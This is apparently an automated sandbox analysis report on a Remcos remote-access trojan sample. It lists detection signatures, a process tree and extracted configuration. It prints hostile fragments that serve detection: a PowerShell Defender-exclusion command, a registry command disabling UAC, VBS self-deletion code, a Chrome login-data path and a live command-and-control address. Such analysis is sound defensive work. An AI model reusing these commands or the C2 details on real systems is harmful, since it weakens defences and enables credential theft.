Windows Analysis Report
iGhDjzEiDU.exe

Overview

General Information

Sample name: iGhDjzEiDU.exe (renamed because original name is a hash value)
Original sample name: 7caf240db905f259197cf71b03acf888.exe
Analysis ID: 1583975
MD5: 7caf240db905f259197cf71b03acf888
SHA1: d8d9726a0a67795a01fed368055d9315feada3fd
SHA256: c8017f526793dd8b6b6e98bfa9847fcf3aa7c4096a8432719a8324e06ba8c088
Tags: exe, RAT, RemcosRAT, user-abuse_ch

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates autostart registry keys with suspicious names
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Query firmware table information (likely to detect VMs)
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspect Svchost Activity
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • iGhDjzEiDU.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\iGhDjzEiDU.exe" MD5: 7CAF240DB905F259197CF71B03ACF888)
    • powershell.exe (PID: 1740 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • iGhDjzEiDU.exe (PID: 3612 cmdline: "C:\Users\user\Desktop\iGhDjzEiDU.exe" MD5: 7CAF240DB905F259197CF71B03ACF888)
    • iGhDjzEiDU.exe (PID: 2992 cmdline: "C:\Users\user\Desktop\iGhDjzEiDU.exe" MD5: 7CAF240DB905F259197CF71B03ACF888)
      • graias.exe (PID: 6620 cmdline: "C:\Users\user\AppData\Roaming\Graias\graias.exe" MD5: 7CAF240DB905F259197CF71B03ACF888)
        • powershell.exe (PID: 7176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 7336 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • graias.exe (PID: 7188 cmdline: "C:\Users\user\AppData\Roaming\Graias\graias.exe" MD5: 7CAF240DB905F259197CF71B03ACF888)
          • svchost.exe (PID: 7248 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 7556 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2000,i,13104816673025473941,13422850102401617178,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 6620 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 1704 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 7312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 3052 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1748 --field-trial-handle=2016,i,6952115490064793543,9344193390170368015,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 6212 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8332 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1980,i,6037255309931644860,773684642686352873,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8440 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 8916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9116 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1988,i,6741851451867710431,3176181943120798108,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 9124 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 3052 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1984,i,6477219484691926715,17097649623628388741,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8860 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8452 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=1956,i,397094272896585161,9213667926170046926,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 6896 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 8116 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9144 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1984,i,15953286615006375795,524760772625708092,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8028 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1896,i,8025100827868505226,8846340673771724363,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • dxdiag.exe (PID: 8544 cmdline: "C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txt MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
          • graias.exe (PID: 8392 cmdline: C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg" MD5: 7CAF240DB905F259197CF71B03ACF888)
          • graias.exe (PID: 8432 cmdline: C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg" MD5: 7CAF240DB905F259197CF71B03ACF888)
          • graias.exe (PID: 7468 cmdline: C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg" MD5: 7CAF240DB905F259197CF71B03ACF888)
          • graias.exe (PID: 8576 cmdline: C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\orbocvcopxyxxqzovbukeapdendakrxtoq" MD5: 7CAF240DB905F259197CF71B03ACF888)
          • graias.exe (PID: 3068 cmdline: C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon" MD5: 7CAF240DB905F259197CF71B03ACF888)
          • graias.exe (PID: 3084 cmdline: C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon" MD5: 7CAF240DB905F259197CF71B03ACF888)
          • svchost.exe (PID: 2188 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 1068 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9176 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1164 --field-trial-handle=1988,i,14003735333465884459,4249736709750483152,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8096 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1996,i,9861328130371480487,5472941936562496665,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8364 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 8888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 5500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1980,i,14451717029141036046,9817444519185968189,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8172 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 1004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1980,i,13194812879482372137,17589311234174251836,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8548 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 2332 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1980,i,4041789208375361090,5104077722080206453,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8428 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1900,i,964775095578921725,9120990377794690672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 4500 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
          • wscript.exe (PID: 2920 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • chrome.exe (PID: 2828 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2052,i,5101334319077942357,3031038982098258924,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • mstee.sys (PID: 4 cmdline: MD5: 244C73253E165582DDC43AF4467D23DF)
  • mskssrv.sys (PID: 4 cmdline: MD5: 26854C1F5500455757BC00365CEF9483)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["185.234.72.215:4444:0"], "Assigned name": "Graias", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "graias.exe", "Startup value": "Enable", "Hide file": "Enable", "Mutex": "Rmc-O844B9", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Graias", "Keylog folder": "graias", "Keylog file max size": ""}
Source | Rule | Description | Author | Strings
C:\ProgramData\graias\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown |
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
Source | Rule | Description | Author | Strings
0.2.iGhDjzEiDU.exe.43c65b8.3.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
0.2.iGhDjzEiDU.exe.43c65b8.3.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0.2.iGhDjzEiDU.exe.43c65b8.3.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
0.2.iGhDjzEiDU.exe.43c65b8.3.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x69ef8:$a1: Remcos restarted by watchdog!
  • 0x6a470:$a3: %02i:%02i:%02i:%03i
0.2.iGhDjzEiDU.exe.43c65b8.3.unpack | REMCOS_RAT_variants | unknown | unknown |
  • 0x64194:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64110:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64110:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x64c10:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64204:$str_b2: Executing file:
  • 0x6503c:$str_b3: GetDirectListeningPort
  • 0x64a00:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x64b80:$str_b7: \update.vbs
  • 0x6422c:$str_b9: Downloaded file:
  • 0x64218:$str_b10: Downloading file:
  • 0x642bc:$str_b12: Failed to upload file:
  • 0x65004:$str_b13: StartForward
  • 0x65024:$str_b14: StopForward
  • 0x64ad8:$str_b15: fso.DeleteFile "
  • 0x64a6c:$str_b16: On Error Resume Next
  • 0x64b08:$str_b17: fso.DeleteFolder "
  • 0x642ac:$str_b18: Uploaded file:
  • 0x6426c:$str_b19: Unable to delete:
  • 0x64aa0:$str_b20: while fso.FileExists("
  • 0x64749:$str_c0: [Firefox StoredLogins not found]

System Summary

Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 185.234.72.215, DestinationIsIpv6: false, DestinationPort: 4444, EventID: 3, Image: C:\Users\user\AppData\Roaming\Graias\graias.exe, Initiated: true, ProcessId: 7188, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\iGhDjzEiDU.exe", ParentImage: C:\Users\user\Desktop\iGhDjzEiDU.exe, ParentProcessId: 6984, ParentProcessName: iGhDjzEiDU.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe", ProcessId: 1740, ProcessName: powershell.exe
